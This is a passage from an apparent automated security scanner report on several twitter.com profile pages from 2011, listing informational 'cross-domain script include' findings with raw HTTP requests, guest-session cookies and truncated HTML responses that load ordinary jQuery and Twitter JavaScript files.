Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266020-27916-18382
ETag: "e0a2dddf6e04f8631a548ec38cc9be5b"
Last-Modified: Sat, 29 Jan 2011 01:53:40 GMT
X-Runtime: 0.01575
Content-Type: text/html; charset=utf-8
Content-Length: 29153
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/twitter.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261955" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/geov1.js?1296261955" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/api.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/dismissable.js?1296261955" type="text/javascript"></script>
...[SNIP]...

18.327. http://twitter.com/ExpertDan

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ExpertDan

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ExpertDan HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234706-2062-7048
ETag: "d1b23d363622af7dc57fa3978eedfa84"
Last-Modified: Fri, 28 Jan 2011 17:11:46 GMT
X-Runtime: 0.00839
Content-Type: text/html; charset=utf-8
Content-Length: 53196
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.328. http://twitter.com/ExpertDan

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ExpertDan

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ExpertDan HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225052-83422-12297
ETag: "71df0fbad70a67fb009c57f7a62454f1"
Last-Modified: Fri, 28 Jan 2011 14:30:52 GMT
X-Runtime: 0.01535
Content-Type: text/html; charset=utf-8
Content-Length: 53009
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.329. http://twitter.com/GQMagazine

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /GQMagazine

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /GQMagazine HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:54 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265974-66159-11366
ETag: "0c7b3f1ee02a220dddae84a56bd4dae8"
Last-Modified: Sat, 29 Jan 2011 01:52:54 GMT
X-Runtime: 0.01364
Content-Type: text/html; charset=utf-8
Content-Length: 51000
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/twitter.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261955" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/geov1.js?1296261955" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/api.js?1296261955" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/dismissable.js?1296261955" type="text/javascript"></script>
...[SNIP]...

18.330. http://twitter.com/Gr8BosFoodBank

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Gr8BosFoodBank

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Gr8BosFoodBank HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265282-79208-29747
ETag: "a6d77c28a643e235a002a7eb55dd8452"
Last-Modified: Sat, 29 Jan 2011 01:41:22 GMT
X-Runtime: 0.00773
Content-Type: text/html; charset=utf-8
Content-Length: 53288
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/twitter.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247836" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247836" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/api.js?1296247836" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/dismissable.js?1296247836" type="text/javascript"></script>
...[SNIP]...

18.331. http://twitter.com/Harvard

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Harvard

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Harvard HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:56 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265976-30452-57191
ETag: "f592e2869b28d974ff30653c3b748799"
Last-Modified: Sat, 29 Jan 2011 01:52:56 GMT
X-Runtime: 0.01723
Content-Type: text/html; charset=utf-8
Content-Length: 51819
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/twitter.js?1296247248" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247248" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247248" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247248" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/api.js?1296247248" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/dismissable.js?1296247248" type="text/javascript"></script>
...[SNIP]...

18.332. http://twitter.com/Jarvis_Green

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /Jarvis_Green

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Jarvis_Green HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:28 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265288-56506-41031
ETag: "1fbdd011dd022432b9be5211b927eb5e"
Last-Modified: Sat, 29 Jan 2011 01:41:28 GMT
X-Runtime: 0.00821
Content-Type: text/html; charset=utf-8
Content-Length: 29885
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6FWluX25ld191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIM07wzC0BOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--20fad198c863fbb6166907be6f67cbeb22702d85; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/following.js?1296263125" type="text/javascript"></script>
...[SNIP]...

18.333. http://twitter.com/JennyMcCarthy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /JennyMcCarthy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /JennyMcCarthy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:22 GMT
Server: hi
Status: 200 OK
